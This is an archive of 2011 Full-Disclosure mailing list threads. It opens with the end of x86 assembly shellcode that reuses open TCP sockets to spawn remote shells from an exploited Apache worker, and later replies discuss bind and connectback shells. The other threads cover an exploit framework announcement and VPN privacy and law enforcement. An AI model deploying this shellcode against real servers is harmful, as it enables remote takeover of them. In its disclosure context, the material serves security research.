// Use a higer value when apache has more fds. Caveat: value too high
// might result in other mpm-thread SEGV before this thread can do
// his first fork.
add $0x22,%%edi;
forkloop:;
dec %%edi;
jz endloop;
movl %%edi,(%%esp); // fd
movl %%esi,0x4(%%esp); // stdin
// load dup2 addr rel to mprotect, use lea with negative value to
// stay 0-byte free
// print /x *dup2 - *mprotect - 25
lea 0x3aa7(%%ebx),%%eax;
// dup2 fd to stdin: leaves ebx intact
call *%%eax;
// Just test if fork was successful, telling us that this is a valid
// fd. It does not matter if shell is started on logfile-fd, this
// will just leave a dead shell
test %%eax,%%eax;
jnz forkloop;
// load fork addr rel to mprotect:
// print /x *__libc_fork - *mprotect - 25
lea 0xfffcc207(%%ebx),%%eax;
call *%%eax; // fork
test %%eax,%%eax; // fork failed or in parent process?
jnz forkloop;
// Replace with heap target pos after compile, should point to
// apr_memnode_t + 0x8 + n*0x100 to have correct alignment. Just
// insert 0-bytes in the otherwise 0-byte-less heap data
movl $0xade04008,%%eax;
movl %%esi,0x7(%%eax);
movl %%eax,(%%esp); // program name
movl %%eax,0x8(%%esp); // program name
lea 0x8(%%esp),%%eax;
movl %%eax,0x4(%%esp); // arglist
movl %%esi,0xc(%%esp); // arg end
// load execv addr rel to mprotect:
// print /x *execv - *mprotect - 25
lea 0xfffcc6a7(%%ebx),%%eax;
// execv
call *%%eax; // exec
endloop:;
jmp endloop;
jmp forkloop;
nop;
nop;
nop;
nop;
pushl 0x42424242;
: // output
:m(maddr),m(result) // input (1)
:%ebx, %edx, %edi // clobbered register
);
return(0);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Are there any ideas how to make the code more robust (currently raciness due to frequent syscalls is problematid), smaller or add features (I thought using the libc GOT, but this made code larger and I do not know if that would make code much more portable)? What about using libcurl/curlsetopt_url and the other curl options On 5 October 2011 08:26, halfdog m...@halfdog.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout. Are there any ideas how to make the code more robust (currently raciness due to frequent syscalls is problematid), smaller or add features (I thought using the libc GOT, but this made code larger and I do not know if that would make code much more portable)? PS: There is no use to compile or run it, it is just embedded into .c file for compilation (too lazy to look up gcc args for .S assem) before insertion into vectors. - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFOi3nbxFmThv7tq+4RAv8cAJ4tR3T2Ssx8SOYr5eDqX5OYqNyhmgCfbjd1 f9X896pIjKEn/l/3ZLv1Ha8= =5K0l -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Supporting it would then mean, i guess there would be some kind of neat cyber attacks happening on wall street major shareholders :P or is it peaceful, sit in like this time ;P hehe.. On 5 October 2011 01:34, Laurelai Storm laure...@oneechan.org wrote: I believe they are supporting it. On Oct 4, 2011 9:29 AM, Georgi Guninski gunin...@guninski.com wrote: On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote: What tears? I don't even use those providers. What a nice drivel in this thread :))) btw, are Anonymous affiliated/supporting the usa protests aka OccupyWallStreet? all the usa needs is a revolution just before they go bankrupt :) -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Hi halfdog, Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout. wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if i'm talking about different thing. -- Cheers, Kai ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-04, at 02:43, Darren Martyn wrote: Is there actually a non backdoored variant of said code? I have not seen any CVE mentioning that exploit so I was naturally wondering. You are assuming that there is some substance to the code *besides* being a trojan/backdoor. Your assumption is mistaken -- there's no substance to it at all. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
On 2011-10-04, at 14:39, Kai wrote: Hi halfdog, Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout. wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if i'm talking about different thing. It's a generic method of getting a shell set up once you have code execution, not an exploit for any specific bug. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
There is ways to make it*say* things, like show system info etc on stdout, without using that bug.. lookup a decent connectback shell, most perl ones have fine stdinout and use printf or other means.. On 5 October 2011 08:39, Kai k...@rhynn.net wrote: Hi halfdog, Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout. wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if i'm talking about different thing. -- Cheers, Kai ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
could be used a very handy 'bind' shell tho... On 5 October 2011 08:51, Andrew Farmer andf...@gmail.com wrote: On 2011-10-04, at 14:39, Kai wrote: Hi halfdog, Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout. wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if i'm talking about different thing. It's a generic method of getting a shell set up once you have code execution, not an exploit for any specific bug. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello Kai, Kai wrote: Hi halfdog, Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. It uses the still open tcp connections to the server to spawn the shells, so that no backconnect is needed. Of course, it does not give remote root but only httpd user privs. And you should send exec 10 as first command if you want to see remote shell stdout. wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if i'm talking about different thing. Thanks for the link. I have to look into it closer, perhaps my code is just working because I dup2 the fd to stdin before exec, which might get rid of the FD_CLOEXEC. At least in tests, where I injected code into mpm-worker on x86 (32bit) using gdb and other methods, it succeeded in giving me remote shell. hd - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFOi4EzxFmThv7tq+4RAvyTAJoD41tl+gapCGhgYbkuCZrdaSqpkgCfZ5Ew HXuO9fRUHd4bJWyTu0QaWi0= =2uWq -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 halfdog wrote: Hello Kai, Kai wrote: Hi halfdog, Just for those, who want to build their own apache shell code for testing purposes, this snip might be of some use. ... wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 --- https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 sorry if i'm talking about different thing. Thanks for the link. I have to look into it closer, perhaps my code is just working because I dup2 the fd to stdin before exec, which might get rid of the FD_CLOEXEC. At least in tests, where I injected code into mpm-worker on x86 (32bit) using gdb and other methods, it succeeded in giving me remote shell. Yes, it's the the dup2 that does the trick: man: dup, dup2 - duplicate a file descriptor The two descriptors do not share file descriptor flags (the close-on-exec flag). The close-on-exec flag (FD_CLOEXEC; see fcntl(2)) for the duplicate descriptor is off. That is why, the tcp-sock fd stays alive after execv(/bin/sh, ...) hd http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFOi4TuxFmThv7tq+4RAi5bAJ9P7/gQ4tF7LKhJ/+kAndcmUVOZZACfabNt rBoepsZNTJ6Ygoob2jrPtYg= =u+TM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
I don't think it's supposed to be a secret. There are also references to Insect Pro in the source code: https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/main/License.java BTW, you gotta love the scanner :) https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java On Tue, Oct 4, 2011 at 9:31 PM, Justin Klein Keane jus...@madirish.netwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 insecurityresearch.com (the Insect PRO site) does in fact seem to redirect to exploitpack.com - nice catch Chris. Justin Klein Keane http://www.MadIrish.net The digital signature on this e-mail may be confirmed using the PGP key located at: http://www.madirish.net/gpgkey On 10/04/2011 02:46 PM, ctrun...@christophertruncer.com wrote: So this is from the same people that developed Insect Pro? Chris On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a JAVA GUI, Python as Engine and well-known exploits made by users. It has a module editor to make the task of developing new exploits easier, Instant Search and XML-based modules. This open source project comes to fill a need, a high quality framework for exploits and security researchers with a GPL license and Python as engine for its modules. GPL license to ensure the code will always be free Instant search built-in for modules easy access Module editor that allows the user to create custom exploits Modules use XML DOM, really easy to modify Python as Engine because its the language more used on security related programming We are actually working with social code network, to participate in this project you will only need a GitHub account. Also, I am looking for financial support to keep me coding. If you want to be part of this open source project or just want to collaborate with me: Please reply to jsa...@exploitpack.com Why don’t you download and give it a try right now? While downloading, you may watch this quick video on YouTube! Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website: http://www.exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iPwEAQECAAYFAk6LXyQACgkQkSlsbLsN1gDTAwb/U8PFg04A1Te4LywChw0tMQeG IZZf1wc3Uo0SVYoTxRjRgCfYKyLNaAgt2jvpxoaj2RlJssU/Conj7mBNXc1if3yj Jx+i2uKWUs0PMxU3reze5/xLrAL1avXAlpSeM9/9WO1hHeW/s7NTQUnMIRtnDwhT TII1euY67LuyQUqsK7LhShVZEK2uCu3pmIS3SIxTJKATXmo1UtU2VYxvnfLSVD8+ KwxL166Q20Xhyd4+i+u5buOGARm3vOO5d3wiN8hEuNXSJXM4v6dswUaR1y4Zx9U6 3PrlNE7PDDdjWHj2mcA= =zyNs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
XML Modules? In *my* exploit pack? -Travis On Tue, Oct 4, 2011 at 3:44 PM, Mario Vilas mvi...@gmail.com wrote: I don't think it's supposed to be a secret. There are also references to Insect Pro in the source code: https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/main/License.java BTW, you gotta love the scanner :) https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java On Tue, Oct 4, 2011 at 9:31 PM, Justin Klein Keane jus...@madirish.netwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 insecurityresearch.com (the Insect PRO site) does in fact seem to redirect to exploitpack.com - nice catch Chris. Justin Klein Keane http://www.MadIrish.net The digital signature on this e-mail may be confirmed using the PGP key located at: http://www.madirish.net/gpgkey On 10/04/2011 02:46 PM, ctrun...@christophertruncer.com wrote: So this is from the same people that developed Insect Pro? Chris On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a JAVA GUI, Python as Engine and well-known exploits made by users. It has a module editor to make the task of developing new exploits easier, Instant Search and XML-based modules. This open source project comes to fill a need, a high quality framework for exploits and security researchers with a GPL license and Python as engine for its modules. GPL license to ensure the code will always be free Instant search built-in for modules easy access Module editor that allows the user to create custom exploits Modules use XML DOM, really easy to modify Python as Engine because its the language more used on security related programming We are actually working with social code network, to participate in this project you will only need a GitHub account. Also, I am looking for financial support to keep me coding. If you want to be part of this open source project or just want to collaborate with me: Please reply to jsa...@exploitpack.com Why don’t you download and give it a try right now? While downloading, you may watch this quick video on YouTube! Video: http://www.youtube.com/watch?v=cMa2OrB7b5A Website: http://www.exploitpack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iPwEAQECAAYFAk6LXyQACgkQkSlsbLsN1gDTAwb/U8PFg04A1Te4LywChw0tMQeG IZZf1wc3Uo0SVYoTxRjRgCfYKyLNaAgt2jvpxoaj2RlJssU/Conj7mBNXc1if3yj Jx+i2uKWUs0PMxU3reze5/xLrAL1avXAlpSeM9/9WO1hHeW/s7NTQUnMIRtnDwhT TII1euY67LuyQUqsK7LhShVZEK2uCu3pmIS3SIxTJKATXmo1UtU2VYxvnfLSVD8+ KwxL166Q20Xhyd4+i+u5buOGARm3vOO5d3wiN8hEuNXSJXM4v6dswUaR1y4Zx9U6 3PrlNE7PDDdjWHj2mcA= =zyNs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | TravisBiehn.comhttp://www.travisbiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
On 10/4/11 12:44 PM, Mario Vilas wrote: I don't think it's supposed to be a secret. There are also references to Insect Pro in the source code: BTW, you gotta love the scanner :) https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java Looks a bit (identical) to http://www.vogella.de/articles/EclipseJobs/article.html#progressreport :p ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On Mon, Oct 3, 2011 at 5:48 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 12:37 PM, Jeffrey Walton wrote: On Mon, Oct 3, 2011 at 5:21 PM, Laurelailaure...@oneechan.org wrote: On 10/3/2011 12:16 PM, Ferenc Kovacs wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelailaure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. The idea that if you've done nothing wrong, you have nothing to worry about assumes that the government is full of good people that would not abuse their power, ever. Even if this were true now, we cannot be sure it'll be true in the future and its damn sure not true now. Definetly not true in the past. Confer: Martin Luther King was subjected to tens of thousands of illegal wire taps by the FBI because he (and a lot of other people) felt black folks should get the same rights as white folks. The guy who did it was honored in death, and the bureau he helped shape actually carries fidelity and integrity in their motto. Twisted but true. Jeff I am glad there are people here who understand the need for real privacy in the modern age. The US Government has proven *repeatedly* that the more power it has the less trustworthy it is especially when it comes to privacy concerns. The threat model should include government and corporate: http://lists.randombit.net/pipermail/cryptography/2011-September/001474.html Why is a third party (CAs) involved when a pre-exisiting relationship exisits: http://lists.randombit.net/pipermail/cryptography/2011-September/001396.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Would you kindly die in a fire? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
On Wed, 05 Oct 2011 08:55:07 +1100, xD 0x41 said: could be used a very handy 'bind' shell tho... I swear, bind shell code is like Our Friend The Beaver school essay assignments - everybody ends up writing one, they all look the same, and almost none are any good. ;) pgpNwBO50cZVs.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
On Tue, 04 Oct 2011 20:01:26 EDT, Travis Biehn said: XML Modules? In *my* exploit pack? XML - the kudzu of the internet. pgptYubnGpgKV.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). pgp8rQMO795v3.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
haha very true but, still a very good/easy and, often used as example code, but, yes most are assignments usually :s and, actually seen as a featre for some people, who like , tend to forget passes rofl :P On 5 October 2011 11:53, valdis.kletni...@vt.edu wrote: On Wed, 05 Oct 2011 08:55:07 +1100, xD 0x41 said: could be used a very handy 'bind' shell tho... I swear, bind shell code is like Our Friend The Beaver school essay assignments - everybody ends up writing one, they all look the same, and almost none are any good. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
(Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? On Tue, Oct 4, 2011 at 8:05 PM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On 10/4/2011 6:35 PM, adam wrote: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? On Tue, Oct 4, 2011 at 8:05 PM, valdis.kletni...@vt.edu mailto:valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com mailto:tyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
That actually depends on the situation, contempt can be criminal. And frankly if you refuse a court order for information like that, the LE officers will just seize it by gunpoint legally, then arrest you. I'm curious as to what you think would cause contempt to be a criminal offense, especially in that example. Secondly, without the appropriate warrant - they couldn't legally take anything. If they disregarded that truth and did so anyway, they'd open themselves up to a pretty big lawsuit for violating that individual's civil rights as well as due process. Not to mention, anything found would likely end up being inadmissible because it was obtained illegally. On Tue, Oct 4, 2011 at 10:39 PM, Laurelai laure...@oneechan.org wrote: On 10/4/2011 6:35 PM, adam wrote: (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). You do realize that (at least in the US) - contempt is *not* a criminal offense, don't you? On Tue, Oct 4, 2011 at 8:05 PM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. Alleged Yes. So? In most jurisdictions, alledged and probable cause is sufficient to get a court to sign off on a subpoena and/or warrants. Dear Judge: On Aug 23, a hacker using the handle JustFellOutOfTree did violate Section N, Clause X.Y of the criminal code by hacking into BigStore.com. The connection was traced back to the provider VPNs-R-Us. We would like a court order requesting VPNs-R-Us to provide any and all information they may have regarding this user. That will usually do it (after bulked up to about 3 pages with legalese and dotting the t's and crossing the i's). The next morning, the manager at VPNs-R-Us gets to his office, and finds two guys with guns and a signed piece of paper. At which point one of two things will happen: 1) the guy rolls and gives up all the info. 2) the guy calls his lawyer and makes sure that he gives up all the required info, and not one byte more. (Option 3 - the guy heads downtown on a contempt of court charge - happens so rarely that it's basically a hypothetical). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - 